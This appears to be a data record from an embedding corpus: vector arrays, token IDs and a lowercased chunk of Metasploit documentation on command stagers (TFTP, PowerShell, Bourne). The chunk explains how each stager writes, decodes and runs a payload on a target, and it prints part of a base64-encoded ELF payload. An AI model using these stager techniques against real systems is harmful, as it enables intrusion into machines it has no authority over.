-0.537284791469574, 0.12346599996089935, 0.5334247946739197, -0.2742314040660858, -0.8412930369377136, 0.19003842771053314, 0.5475917458534241, 0.7970102429389954, 0.3568068742752075, -0.11486662179231644, 0.05214160680770874, 0.12160207331180573, 0.23601356148719788, 0.026520607993006706, 0.26905444264411926, -0.0305582657456398, 0.2003011256456375, -0.20947948098182678, 0.6185049414634705, -0.2438269704580307, -0.07372161746025085, 0.47611406445503235, 0.20252682268619537, -0.14280478656291962, 0.5496326088905334, 0.8795773983001709, 0.033314112573862076, 0.4543761909008026, 0.900173544883728, 0.4791768193244934, -0.32739320397377014, 0.2585943043231964, -0.6760109663009644, 0.16939884424209595, -0.34729114174842834, 0.20910286903381348, -0.17101383209228516, 0.5398775339126587, 0.6747878193855286, -0.8669834136962891, 0.08138922601938248, 0.468478262424469, -0.347592830657959, -0.8296297788619995, 0.006886947434395552, -0.5367202758789062, 0.39534997940063477, -0.24903711676597595, -0.14476871490478516, 0.9214838743209839, 0.11770718544721603, 0.2264656275510788, -0.5504436492919922, 0.16885563731193542, 0.5683236122131348, -0.09367422014474869, 0.07279370725154877, 0.12448201328516006, 0.03728896379470825, -0.03503638878464699, 0.32997605204582214, -0.1573028862476349, 0.09215778112411499, 0.5609554648399353, 0.36555227637290955, -0.14391253888607025, 0.3570716083049774, -0.06390640139579773, 0.5324261784553528, 0.10823510587215424, -0.186972513794899, -0.14711298048496246, 0.18713904917240143, -0.15782152116298676, 0.07506977021694183, -0.3109118938446045, 0.2521568238735199, -0.20308274030685425, -0.2979047894477844, 0.3843132257461548, -0.12777647376060486, 0.013221926987171173, -0.8357189297676086, 0.6117295026779175, -0.5231567025184631, 0.05454500764608383, -0.056753724813461304, 0.13257475197315216, -0.265009343624115, 1.255746841430664, -0.1344195157289505, 0.5916851758956909, -0.1540309637784958, 0.3152230381965637, 0.1133371889591217, 0.4701455235481262, -0.30072149634361267, -0.29415765404701233, -0.4744791090488434, 0.2213055044412613, -0.6483492851257324, -0.4861959218978882, 0.3734995722770691, 0.024737922474741936, 0.28935131430625916, -0.12418390810489655, 0.24942547082901, -0.830528736114502, 0.003254692768678069, -0.3272324502468109, -0.6714767217636108, 0.03739240765571594, -0.41255563497543335, -0.5309802293777466, 0.17198066413402557, 0.5683184862136841, 0.015142765827476978, 0.2557578980922699, -0.011597842909395695, -0.8112993240356445, -0.7615696787834167, -0.03557359054684639, -0.20916803181171417, 0.6833235621452332, 0.002744152210652828, -0.09548424929380417, 0.380890429019928, -0.21359705924987793, -0.8689422607421875, 0.16319730877876282, -0.045251477509737015, -0.4455501139163971, 0.7052990794181824, 0.36833617091178894, 0.6075596213340759, 0.012101436965167522, 0.16551552712917328, -0.24672800302505493, 0.14322872459888458, 0.8119596838951111, 0.32450973987579346, 0.1383735090494156, -0.15364114940166473, 0.15505395829677582, -0.01562050636857748, 0.03503307327628136, 0.4552529752254486, -0.3841232657432556, -0.3538755178451538, -0.04362362250685692, -0.10809284448623657, -0.937663197517395, -0.16516466438770294, -0.27422353625297546, -0.06171712651848793, 0.6138016581535339, 0.05945919081568718, -1.0057698488235474, 0.24218274652957916, -0.4859110414981842, -0.743352472782135, 0.21808676421642303, 0.17237767577171326, -0.23639243841171265, -0.20901376008987427, 0.7733780741691589, -0.5242412686347961, 4.422031879425049, -0.07738964259624481, 0.4798908233642578, 0.2482862025499344, -0.08653413504362106, 0.4824798107147217, 0.8673164248466492, -0.8712645173072815, 0.098060742020607, 0.1581307053565979, -0.20570912957191467, -0.6271170377731323, 0.28939947485923767, 0.8418028354644775, -0.04018767178058624, 0.10199561715126038, -0.9445170164108276, -0.1436324119567871, 0.1987209916114807, -0.6684474349021912, -0.6699349284172058, -0.013285946100950241, -0.25408726930618286, 0.5635069608688354, -0.19854974746704102, 0.4173421263694763, 0.5444235801696777, -0.567919135093689, 0.5337184071540833, 0.07263872772455215, -0.06004289165139198, -0.1962181180715561, 0.36635294556617737, -0.15764766931533813, -0.606274425983429, 0.31691768765449524, -0.1621381938457489, -0.7600733637809753, -0.5867213606834412, -0.8380855917930603, 0.7868486046791077, 0.27066606283187866, -0.2312382459640503, -0.2805444002151489, -0.15429148077964783, 0.6540379524230957, -1.0508264303207397, -0.06893320381641388, 0.9518153667449951, -1.0069750547409058, 0.701585054397583, -0.31232547760009766, 1.127400517463684, -0.16395039856433868, -1.117009162902832, -0.2405308037996292, 0.14172032475471497, 0.14786610007286072, 0.0676257535815239, 0.24983584880828857, 1.201707363128662, -0.3879845142364502, 0.3977493941783905, -0.16073022782802582, -1.0099369287490845, 0.7663228511810303, 0.015774916857481003, 0.3595198392868042, 0.37970298528671265, -0.4797493517398834, 0.15154723823070526, 0.04941599816083908, 0.01530064083635807, -0.6902894377708435, 0.9417645335197449, -0.616512656211853, 0.15681549906730652, -0.2258770912885666, 0.3498726487159729, -0.524357795715332, 0.1738429069519043, -0.7228325605392456, -1.1178256273269653, 0.07018792629241943, 0.8396614789962769, 0.17556583881378174, -0.17409338057041168, -1.191174030303955, 0.49870726466178894, 0.18934766948223114, 0.4547295570373535, 0.786312460899353, -0.13209393620491028, 0.5856428742408752, -0.061155784875154495 ]
[ 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 8292, 5339, 21823, 2140, 1007, 2017, 2097, 2036, 2342, 2000, 3342, 2000, 2275, 1996, 4132, 1999, 1996, 27425, 1024, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 2139, 8569, 2290, 1035, 4339, 3094, 2754, 2099, 1011, 3645, 2069, 10760, 2139, 8569, 2290, 1035, 4339, 3094, 2754, 2099, 2003, 2019, 2214, 3645, 7577, 2000, 4339, 1037, 5371, 2000, 1996, 2291, 1012, 1999, 2023, 2553, 1010, 2057, 2224, 2139, 8569, 2290, 1012, 4654, 2063, 2000, 4339, 1037, 2235, 1012, 5658, 12441, 1010, 1998, 2008, 12441, 2097, 2202, 1037, 2002, 2595, 1011, 2004, 6895, 2072, 5371, 2580, 2011, 1996, 9052, 3094, 1010, 21933, 3207, 1996, 12441, 1010, 1998, 2633, 15389, 1012, 5525, 1010, 2000, 2022, 2583, 2000, 2224, 2023, 3094, 2754, 2099, 1010, 2017, 2442, 2191, 2469, 1996, 4539, 2003, 1037, 3645, 2291, 2008, 6753, 1012, 5658, 1012, 2000, 2224, 1996, 2139, 8569, 2290, 1035, 4339, 3094, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 2139, 8569, 2290, 1035, 4339, 1005, 1033, 2030, 2275, 1996, 1024, 2139, 8569, 2290, 1035, 4339, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 2139, 8569, 2290, 1035, 4339, 1007, 2017, 2097, 2036, 2342, 2000, 3342, 2000, 2275, 1996, 4132, 1999, 1996, 27425, 1024, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 2139, 8569, 2290, 1035, 2004, 2213, 3094, 2754, 2099, 1011, 3645, 2069, 10760, 2139, 8569, 2290, 1035, 2004, 2213, 3094, 2754, 2099, 2003, 2178, 2214, 3645, 7577, 2109, 2000, 21365, 1037, 4012, 5371, 1010, 1998, 2059, 4012, 5371, 2097, 21933, 3207, 2256, 2002, 2595, 1011, 2004, 6895, 2072, 18093, 1010, 1998, 2059, 15389, 2009, 1012, 2000, 2224, 1996, 2139, 8569, 2290, 1035, 2004, 2213, 3094, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 2139, 8569, 2290, 1035, 2004, 2213, 1005, 1033, 2030, 2275, 1996, 1024, 2139, 8569, 2290, 1035, 2004, 2213, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 2139, 8569, 2290, 1035, 2004, 2213, 1007, 2017, 2097, 2036, 2342, 2000, 3342, 2000, 2275, 1996, 4132, 1999, 1996, 27425, 1024, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 1056, 6199, 2361, 3094, 2754, 2099, 1011, 3645, 2069, 10760, 1056, 6199, 2361, 3094, 2754, 2099, 3594, 1056, 6199, 17299, 1012, 4654, 2063, 2000, 8816, 2256, 18093, 1010, 1998, 2059, 2224, 1996, 2707, 1012, 4654, 2063, 3094, 2000, 15389, 2009, 1012, 2023, 6028, 2069, 2573, 2092, 2114, 2019, 3080, 2544, 1997, 3645, 1006, 2107, 2004, 26726, 1007, 1010, 2138, 10947, 3645, 6681, 2053, 2936, 16500, 1056, 6199, 2361, 1012, 4654, 2063, 2011, 12398, 1012, 1996, 1056, 6199, 2361, 3094, 2754, 2099, 2442, 14187, 2000, 20904, 2361, 3417, 6353, 1010, 2061, 5796, 11329, 5644, 9890, 2442, 2022, 2318, 2004, 7117, 1024, 27634, 5244 ]
metasploit
107.txt
8
##udo. / msfconsole to use the tftp stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['tftp'] or set the : tftp key to execute _ cmdstager : execute _ cmdstager ( flavor : : tftp ) you will also need to remember to set the platform in the metadata :'platform'= >'win'powershell invoke - webrequest - windows onlyto use the powershell invoke - webrequest stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['psh _ invokewebrequest'] or set the : psh _ invokewebrequest key to execute _ cmdstager : execute _ cmdstager ( flavor : : psh _ invokewebrequest ) bourne command stager - multi platformlinemax minimum : 373the bourne command stager supports multiple platforms except for windows. just like many other stagers, it writes a base64 encoded payload to disk, but then it tries to decode it using four different commands : base64, openssl, python, and perl. this is very useful if the target ’ s os is unpredictable. you can see the way it attempts to use multiple decoding techniques by setting verbose to true and launching an exploit that has bourne as a supported command stager flavor and selecting it as the flavor : [ * ] generated command stager : [ " echo - n f0vmrgibaqaaaaaaaaaaaaiapgabaaaaeabaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaeaaoaabaaaa aaaaaaeaaaahaaaaaaaaaaaaaaaaaeaaaaaaaaaaqaaaaaaa + gaaaaaaaab8aqaaaaaaaaaqaaaaaaaamf9qcvizthbiidznmclqikfaagdadwvihcb4uwok qvlqailymwocx2obxg8fsixaedtil0i5agarxaofh8lrsinmahbaaipydwvzsixaesvj / 8l0gfdqi1hqagofsinnsdh2dwvzwv9ihcb5
[ 0.034823570400476456, -0.9376787543296814, 0.26230403780937195, 1.2962219715118408, -0.4558142125606537, -0.5335403084754944, -0.6401228308677673, 0.7972652912139893, 0.09341534227132797, 0.15919816493988037, -0.8244491219520569, -0.21108496189117432, 0.3040867745876312, -0.0799357146024704, 0.02024752087891102, -0.450100302696228, -0.4722738564014435, 0.1805829107761383, -1.274336338043213, -0.4971669614315033, -0.35682159662246704, -0.1246204823255539, -1.0361642837524414, -0.6939058303833008, 0.202201247215271, 0.34674450755119324, 0.06831658631563187, -0.2201642394065857, 0.49121108651161194, 0.4292469620704651, 0.5478450655937195, -0.29587322473526, 0.13830682635307312, -0.3659431040287018, 0.37864506244659424, 0.1313258558511734, 0.6937575340270996, -0.26596400141716003, 0.17627450823783875, -0.6145954728126526, 0.6436919569969177, -0.45570340752601624, 0.005651781335473061, -0.038237378001213074, -0.7827711701393127, -0.43538898229599, 0.6775258183479309, -0.5308189392089844, 0.5599054098129272, -0.4862815737724304, 0.047219134867191315, 0.18836088478565216, -0.34727743268013, 0.5889418721199036, 0.009103248827159405, -0.28243255615234375, -0.4403313398361206, 0.23673862218856812, 0.45001569390296936, 0.10251101851463318, -0.1022534966468811, 0.2022775411605835, -0.04682224243879318, -0.9052655100822449, -0.6629279255867004, 0.03927558287978172, 0.18888971209526062, -0.41266781091690063, -0.13900916278362274, 0.1363251954317093, -0.358643114566803, 0.6856659650802612, -0.2114967554807663, -0.2990911602973938, -0.6929768919944763, 0.17102736234664917, -0.37305593490600586, -0.3542931079864502, 0.055459413677453995, 0.13880449533462524, -0.009803622961044312, 0.5679505467414856, 0.1839144378900528, -0.21498505771160126, -0.05157985910773277, -0.6314535737037659, 0.565388560295105, 0.8254863619804382, -0.27434855699539185, 0.37845876812934875, 0.7654983997344971, 0.3014717698097229, -0.14436428248882294, -0.4418238699436188, -0.05658214911818504, 0.8169558048248291, 0.018634570762515068, 0.04504213482141495, 0.19363610446453094, -0.34673717617988586, 0.7231499552726746, 0.265257865190506, -0.7919062972068787, 0.19535118341445923, -0.4800662398338318, 0.2955538034439087, 0.2271459996700287, -0.8246889710426331, -0.06651117652654648, -1.2639230489730835, 0.7227537631988525, -0.1743670552968979, 0.5211341977119446, -0.05274738743901253, -0.6079569458961487, 0.5066810250282288, 0.7487543821334839, -0.16508670151233673, -0.8003361821174622, 0.7389523983001709, 0.2802058458328247, -0.9243369698524475, 0.42606121301651, -0.3981812000274658, 0.589329183101654, -0.6461241841316223, 0.5740377306938171, 0.39479953050613403, -0.8108012676239014, -0.5688784718513489, 0.056223444640636444, -0.3389395475387573, 0.18970578908920288, 0.44647619128227234, -0.37572064995765686, 0.8191530704498291, -0.18980558216571808, -0.4619903266429901, 0.5810414552688599, -0.7942971587181091, 0.3481960892677307, 0.13296820223331451, 0.32786044478416443, 1.1461397409439087, 0.5301674604415894, 0.10430736094713211, -0.6241015791893005, 0.544529914855957, -0.729822039604187, 0.6388131976127625, -0.6652802228927612, -0.01993023045361042, -0.2584233283996582, -0.44500991702079773, -0.3324362635612488, 0.4820125699043274, 0.48603758215904236, 0.12314768135547638, -0.8033215999603271, 0.3675296902656555, 0.29821208119392395, 0.18967381119728088, 0.2452162355184555, 0.2659892737865448, 0.18253740668296814, 0.2807445228099823, -0.3786729574203491, -1.0030913352966309, -0.7834697961807251, -0.08303625136613846, 0.22860506176948547, 0.23935838043689728, -0.2943178117275238, 0.11330857127904892, 1.3722825050354004, 0.6213138699531555, -0.10203542560338974, -0.2705281674861908, 0.06743407994508743, 0.5386670827865601, -0.6210283637046814, 0.9001266956329346, -0.10409671068191528, 0.6826272010803223, 0.07804011553525925, -0.3589879870414734, 0.19243985414505005, -0.29151836037635803, -0.3656993806362152, 0.3940098285675049, -0.13216353952884674, 0.45597541332244873, -0.000595253542996943, 0.30940985679626465, 0.9048640131950378, 0.5880166292190552, -1.586897373199463, -0.2678503394126892, -0.4837430417537689, -1.2618380784988403, -0.6112723350524902, -0.07547241449356079, -0.16978566348552704, 0.2075459510087967, -0.2344433218240738, -0.07782132923603058, 1.1167675256729126, 0.9444016218185425, 0.4122825860977173, 0.545697808265686, 0.6552308797836304, 0.03640836849808693, -0.16422705352306366, 0.2548903226852417, -0.2811345160007477, 0.24632327258586884, -0.6957017779350281, 0.7235873937606812, -0.16983450949192047, 1.078145146369934, 0.5448406934738159, 0.4412795305252075, 0.47446566820144653, 0.6857987642288208, -0.25168612599372864, -1.2371220588684082, 0.5856717824935913, 0.7092190384864807, -0.6705406904220581, -0.3002668619155884, -0.4868796467781067, -0.0405549593269825, 0.3007339835166931, 0.9063032865524292, 0.4510580897331238, -0.39308789372444153, 0.15394318103790283, 0.06107302010059357, -0.4219802916049957, 0.06096411868929863, 0.5901691913604736, -0.02884271740913391, 0.49130338430404663, 0.7538354992866516, 0.21078349649906158, 0.7535171508789062, 0.059046000242233276, -0.03885797783732414, -0.06402403861284256, 0.5749369263648987, 0.3328607976436615, 0.6584848165512085, 0.3545413017272949, -0.42903462052345276, -0.6193256974220276, -0.607072651386261, 0.5828830599784851, 1.346386194229126, -0.6048442721366882, -1.0353182554244995, -0.053309790790081024, 0.6680507063865662, -0.7159867882728577, 0.06399783492088318, 0.6816272735595703, 1.0327690839767456, -0.5711539387702942, 0.19051028788089752, 0.8399761319160461, -0.36914971470832825, -0.4966847896575928, -0.6109811663627625, -0.41476958990097046, -0.3073136508464813, -0.22038334608078003, -0.09757153689861298, 0.48284849524497986, 0.018753644078969955, 0.2656835615634918, -0.2958035171031952, -0.9612154364585876, -0.10164114832878113, 0.21887679398059845, 0.6877413392066956, 0.38711920380592346, -0.1825001835823059, -0.5198624730110168, 0.6269705891609192, 0.04033873602747917, 0.5183990001678467, -0.48155874013900757, -1.1748276948928833, -0.3461746871471405, -0.14774923026561737, -0.33961495757102966, -0.6495211720466614, 0.39379212260246277, 0.09672169387340546, 0.41802677512168884, -0.3768218457698822, 0.22884929180145264, 0.23795734345912933, 0.5910571813583374, 0.2936621308326721, -0.8436204791069031, 0.6826420426368713, 0.34401029348373413, 0.0004506675759330392, 0.4983353316783905, 0.782319962978363, -0.457136869430542, 0.6460445523262024, 0.11631970852613449, 0.667031466960907, -0.4945598840713501, 1.1996982097625732, 0.5440930724143982, 0.1253000795841217, 0.30040884017944336, -0.14279955625534058, 0.1772506684064865, -0.3639405071735382, -0.1502494513988495, -0.5054333209991455, -0.8796457052230835, 0.20493432879447937, 0.3002170920372009, -0.59975266456604, 0.2697351276874542, -0.6508033871650696, 0.5225163102149963, 0.10560310631990433, -0.5562486052513123, 0.377064973115921, -0.0883343517780304, -0.14951775968074799, -0.5150867104530334, -0.43237319588661194, 0.6216175556182861, 0.24154549837112427, -0.20555700361728668, -0.5279675722122192, 0.08882595598697662, 0.1975945234298706, -0.5494787693023682, 0.6430643796920776, 0.6318646669387817, -0.9454501867294312, -0.19574514031410217, -0.6731595396995544, 0.298755407333374, -0.16564352810382843, 0.505727231502533, 0.5192380547523499, 0.3062068521976471, 0.6383267045021057, -0.5554660558700562, -0.5678233504295349, 0.2117021679878235, 0.21288546919822693, -0.41040873527526855, -0.6080294251441956, 0.17615315318107605, 0.4011303782463074, -1.0925461053848267, -0.5623199939727783, 0.8705954551696777, 0.1291569173336029, 0.7037539482116699, -0.22077685594558716, 0.4147758185863495, 0.1626030057668686, 0.03982994332909584, 0.2800625264644623, -0.4820241332054138, -0.47160711884498596, 0.8047473430633545, -0.3358190059661865, 0.4696340560913086, 0.11752859503030777, 0.3952818810939789, 0.017512105405330658, 0.048170845955610275, 0.18819333612918854, -0.03421510010957718, -0.05027274414896965, -0.14220544695854187, -0.4330991506576538, 0.752615213394165, 0.423469215631485, -0.06743737310171127, -0.3622414469718933, 0.45718899369239807, -0.7194657921791077, -0.7828814387321472, -0.15615041553974152, 0.6815325617790222, 0.8860539197921753, 0.9048147201538086, 0.4853176474571228, 0.6847829818725586, 0.17699508368968964, -0.36292290687561035, 0.5496990084648132, -0.13403576612472534, 0.2482561469078064, -0.0785139873623848, 0.8889999389648438, -0.0602233000099659, 0.5111731290817261, 0.5963670015335083, -0.003603132674470544, -0.7213600277900696, 0.16637901961803436, -0.42553815245628357, 0.3160088062286377, -1.1320067644119263, -0.5840508937835693, 0.14185373485088348, -0.08596409857273102, -0.48104187846183777, -0.8487470746040344, -0.12045213580131531, 1.0697888135910034, 0.7207834720611572, -0.5115880370140076, -0.41092583537101746, -0.5246250033378601, 0.40789952874183655, 0.13995979726314545, -0.4022744297981262, -0.45384564995765686, -0.9957895278930664, -0.6567257046699524, -0.9685852527618408, 0.2803206443786621, 0.48145389556884766, -0.1377968043088913, -0.5205220580101013, -0.7902650833129883, -0.20975954830646515, 0.5472751259803772, -0.15302146971225739, -0.9956244230270386, -0.14112809300422668, 0.1842179149389267, 0.05095207318663597, 0.3286844491958618, -0.592527449131012, -0.23594623804092407, -0.40738141536712646, -0.5824252963066101, 0.7384716272354126, -0.005758216138929129, 0.3198740780353546, 0.22759616374969482, -0.7358841300010681, 0.13261079788208008, 0.23463191092014313, -0.0017343549989163876, -0.3705001175403595, -0.4538725018501282, 0.32466620206832886, -0.47105368971824646, -0.09062788635492325, 0.5455007553100586, -0.456618070602417, 0.5033860206604004, -0.4555513560771942, 0.6328474283218384, -0.10691247135400772, 0.1815318465232849, 0.24871589243412018, -0.5142577290534973, 0.09450522065162659, -0.7765726447105408, 0.3479350507259369, 0.008297477848827839, 0.30705946683883667, 0.08374277502298355, 0.11781639605760574, 0.6818793416023254, 0.29205554723739624, 0.6928534507751465, -1.248058557510376, -0.8408491611480713, 0.22000053524971008, 0.5093274116516113, 0.3096337616443634, -0.5219293236732483, 0.0893469974398613, -0.15154530107975006, -0.5122693181037903, -0.4019796848297119, -0.4235839545726776, -0.5610435009002686, -0.13687945902347565, -0.39849594235420227, 0.3568309545516968, 0.025360526517033577, 0.6624136567115784, -0.2741013467311859, -0.4977185130119324, 0.37565189599990845, -1.0283282995224, -0.07031595706939697, -0.9329002499580383, -0.5399893522262573, -0.6720030307769775, -0.3025710880756378, -0.32508519291877747, -0.27477341890335083, -0.09718117862939835, 0.1097225546836853, 0.3505876064300537, 0.6336328983306885, 0.5362868905067444, -0.7807222008705139, 0.10341664403676987, 0.39882174134254456, -0.18925358355045319, -0.22814151644706726, 0.41087573766708374, 0.6623324751853943, -0.03583230823278427, 0.011938327923417091, -0.4532824158668518, -0.3697564899921417, -1.2848621606826782, -0.7826000452041626, 0.14335711300373077, -0.49263137578964233, 0.26650792360305786, 0.06618682295084, -0.8112004399299622, -0.2181975096464157, -0.028192924335598946, 0.04915928095579147, -0.9860147833824158, -0.10553472489118576, -0.044662728905677795, -0.04156843572854996, -0.16243217885494232, 0.1956387162208557, -0.04833837226033211, -0.6108298301696777, -0.3750334084033966, -0.001349449041299522, -0.15847496688365936, 0.5387568473815918, -0.3567312955856323, 0.4675493836402893, 0.7608816623687744, -0.4830159842967987, -0.4286186397075653, -0.8430054783821106, -0.2849244177341461, 0.1579628735780716, -0.2317347675561905, 0.34354978799819946, -0.9692723751068115, 0.624262809753418, -0.36463096737861633, -0.22047054767608643, -0.3133525252342224, -0.3031097650527954, 0.15444275736808777, -0.19894257187843323, 0.8092285990715027, -0.0978892594575882, 0.02599184960126877, 0.01072016078978777, 0.709480881690979, 0.5302141904830933, -0.002549613593146205, -0.8098013997077942, 0.3159945607185364, -0.678633451461792, -0.7778211832046509, 0.609479546546936, -0.10088403522968292, -0.48573553562164307, 0.46343791484832764, 0.17009465396404266, 0.8018229007720947, -0.8818543553352356, 0.985139787197113, 1.331953525543213, -0.13863018155097961, 0.7460359334945679, -0.9755195379257202, 0.18676093220710754, 1.258606195449829, 0.3426215350627899, 0.033216770738363266, -0.4219099283218384, -0.1675967127084732, 0.13053199648857117, -0.5727110505104065, 0.24696528911590576, -0.669403076171875, -0.7075565457344055, 0.3646276891231537, -0.3558283746242523, 1.2027745246887207, -0.3250378370285034, -1.037140965461731, -0.15762083232402802, 0.39512792229652405, 0.07513503730297089, 0.011841006577014923, -0.30175381898880005, 0.48148661851882935, 0.31342604756355286, -0.39471203088760376, 0.27438685297966003, -0.6900244355201721, -0.35097554326057434, 0.5100020170211792, 0.21730303764343262, -1.260561227798462, 0.9772409796714783, -0.03257925808429718, -0.7713376879692078, -0.3752252161502838, -0.5310735106468201, -0.20446620881557465, -0.5133132338523865, -0.6923760771751404, -0.768554151058197, -0.11806260049343109, 0.21311873197555542, 0.33327358961105347, 1.26358962059021, -0.06979017704725266, 0.05757824704051018, -0.22823768854141235, 0.4491654634475708, 0.23602084815502167, 0.19178682565689087, 0.6307858228683472, -0.5832183361053467, -0.04461713135242462, -1.5744128227233887, -1.0970466136932373, 0.38952764868736267, 0.08709286898374557, 0.5369125008583069, 0.2331364005804062, 0.34139275550842285, -0.007525749504566193, -0.45263242721557617, 0.9926097989082336, 0.3098900616168976, 0.04885334521532059, 0.7999619841575623, -0.14386779069900513, -0.1404097080230713, -0.8547247052192688, 0.5834764838218689, 0.5663537979125977, 0.5692467093467712, -0.48516660928726196, -0.6370997428894043, 0.18905605375766754, -0.46075156331062317, -0.20915941894054413, -1.0235826969146729, -0.726404070854187, -1.086828589439392, -0.2778296172618866, 0.5616430640220642, 0.08612365275621414, 0.12278319150209427, 0.3214324712753296, 0.030821628868579865, -0.5812424421310425, -0.4655330777168274, 0.017970437183976173, -0.20502865314483643, 0.27501776814460754, 0.36831238865852356, 0.2704131305217743, -0.20739209651947021, -0.21748113632202148, -0.8357569575309753, -0.021777648478746414, -0.3310014009475708, -0.7433742880821228, 0.07333380728960037, -0.06927620619535446, -0.4725220799446106, 0.2917593717575073, -0.28328046202659607, -0.36199259757995605, 0.5516244173049927, -0.555105447769165, 0.08111349493265152, 1.1746289730072021, 0.0432918407022953, 0.5174052715301514, 0.5059510469436646, -0.285089910030365, 0.8198586106300354, -0.8932186365127563, -0.11579346656799316, -0.33510780334472656, 0.6282980442047119, 0.8138042688369751, 0.3096871078014374, -0.5644912719726562, -0.03955651447176933, 0.08398483693599701, -0.3790189325809479, 0.10523626953363419, -0.2290835976600647, 0.04926615208387375, -0.3154327869415283, 0.5130341649055481, 0.7607470154762268, 0.636245846748352, 0.8161528706550598, 0.9315928816795349, -0.2279057502746582, 0.7549412846565247, 0.5059000849723816, 0.04746408015489578, -0.7142759561538696, 0.1416471153497696, 0.3048713505268097, -0.39246606826782227, -0.4019688069820404, 0.45913586020469666, -0.24545606970787048, -0.16903603076934814, 0.11038186401128769, -0.2861224412918091, -0.4025624394416809, -0.3077743947505951, -0.2250186800956726, 0.6376299858093262, 0.18785139918327332, -0.019667215645313263, 0.4675266146659851, -0.1957239955663681, -0.8208361864089966, 0.017836352810263634, -0.8750876784324646, -0.008578174747526646, 0.31011250615119934, 0.06680478155612946, -0.3277367651462555, 0.32195812463760376, -0.23724322021007538, -0.21455807983875275, -0.5011112689971924, 0.4192677438259125, 0.48043856024742126, -0.29221251606941223, 0.6301267743110657, 1.5259453058242798, -0.7649691104888916, -0.5020092129707336, -0.48982077836990356, 0.7469743490219116, -0.7723999619483948, -1.0098201036453247, -0.004418948665261269, 0.514446496963501, -0.03901812061667442, 0.02505938708782196, -0.22905980050563812, -0.04133714362978935, 0.4900396764278412, -0.3473409116268158, 0.0015724172117188573, 0.38354167342185974, 0.10859211534261703, 0.16510528326034546, -0.5473153591156006, -0.11687692254781723, 0.27159935235977173, 0.0036318099591881037, 0.7931311726570129, 0.10020862519741058, -0.16468489170074463, 0.4963712990283966, 0.5092920660972595, -0.05471997708082199, 0.8429323434829712, 1.1386895179748535, 0.010443665087223053, -0.653104841709137, 0.13378356397151947, -0.5125839114189148, 0.017170341685414314, -0.07923940569162369, 0.7517685294151306, 0.44739171862602234, 0.5444665551185608, 0.4059542417526245, -0.7010328769683838, 0.04366966709494591, 0.6906741857528687, 0.1190042644739151, -0.3326694667339325, 0.3013549745082855, -0.37289145588874817, 0.15406906604766846, -0.7055594325065613, -0.18550239503383636, 0.16916877031326294, -0.25977522134780884, 0.08373747766017914, -0.171434223651886, -0.06321324408054352, 0.7156766653060913, -0.9637502431869507, 0.3758455812931061, 0.34570571780204773, -0.4381600022315979, 0.049455881118774414, 0.8880587220191956, -0.5027544498443604, 0.0527096651494503, 1.226605772972107, -0.00945560447871685, 0.07848016172647476, 0.6285891532897949, -0.7498480677604675, 0.9683948159217834, 0.07601065933704376, 0.022008465602993965, -0.4159175753593445, 0.1817339062690735, -0.003533165669068694, -0.47393208742141724, 0.17315791547298431, 0.021735412999987602, -0.005322342738509178, 0.3174029290676117, 0.7534382939338684, 0.20098091661930084, -0.08624760061502457, -0.4427816569805145, 0.3998942971229553, -0.06729564070701599, 0.38341453671455383, -0.03206181526184082, -0.39396771788597107, -0.4663366675376892, 1.141804575920105, 0.4086628556251526, 0.8684811592102051, -0.16213583946228027, 0.8453428149223328, -0.34579113125801086, 0.7928346991539001, -0.3622066378593445, 0.02242642268538475, -0.8434186577796936, 0.35551947355270386, -0.5946129560470581, -0.40206584334373474, 0.3406192660331726, -0.20541439950466156, 0.5159250497817993, -0.16942977905273438, 0.6677674651145935, -0.5877586603164673, 0.5529698729515076, -0.10526948422193527, -0.7542660236358643, -0.3314822018146515, -0.04957691207528114, -0.45148199796676636, 0.6276429295539856, 0.44956156611442566, 0.5320214033126831, -0.3311161398887634, -0.31861257553100586, -0.7716276049613953, -0.9379984736442566, -0.3681023120880127, 0.271467924118042, 0.8988268375396729, 0.0826018676161766, -0.6704556941986084, -0.10129332542419434, -0.8166216611862183, -0.3232462406158447, -0.006137944757938385, -0.7522053718566895, -0.08469976484775543, 0.7353004813194275, 0.03443649411201477, 0.6946184039115906, 0.45328715443611145, -0.11904636770486832, 0.3956405222415924, 0.30026334524154663, 0.5757321119308472, 0.23664966225624084, 0.6280965805053711, 0.10244813561439514, -0.1007850170135498, -0.2506449222564697, -0.5901783108711243, 0.6685224771499634, -0.4625275433063507, 0.21184951066970825, -0.33526840806007385, -0.06197013333439827, -0.7438148856163025, -0.07122866064310074, 0.05726976320147514, 0.3902300298213959, 0.2518557012081146, -0.443741112947464, -1.0689895153045654, -0.07211648672819138, -0.22827576100826263, -0.23815883696079254, -0.07301174849271774, 0.00227144081145525, -0.05621929094195366, 0.5684581398963928, 0.22091805934906006, -0.5095406174659729, 4.109766006469727, 0.84196937084198, 0.08223892003297806, -0.24783694744110107, 0.16362008452415466, 0.6561956405639648, 0.8875712752342224, -0.4387124478816986, 0.008568670600652695, -0.9516444802284241, 0.2632899582386017, 0.1457989364862442, 0.1366717517375946, 0.48423466086387634, 0.9807550311088562, 0.5926613807678223, -0.9014485478401184, -0.009339007548987865, 0.03033699281513691, -1.2551052570343018, -0.9245279431343079, 0.08399329334497452, -0.42148634791374207, 0.8186588287353516, -0.28999024629592896, 0.23001229763031006, 0.9686640501022339, -0.4996700882911682, 0.046820808202028275, -0.29804638028144836, -0.7199399471282959, -0.19205856323242188, -0.0685289204120636, -0.1583479940891266, -0.6387696862220764, -0.060393206775188446, -0.08102510124444962, 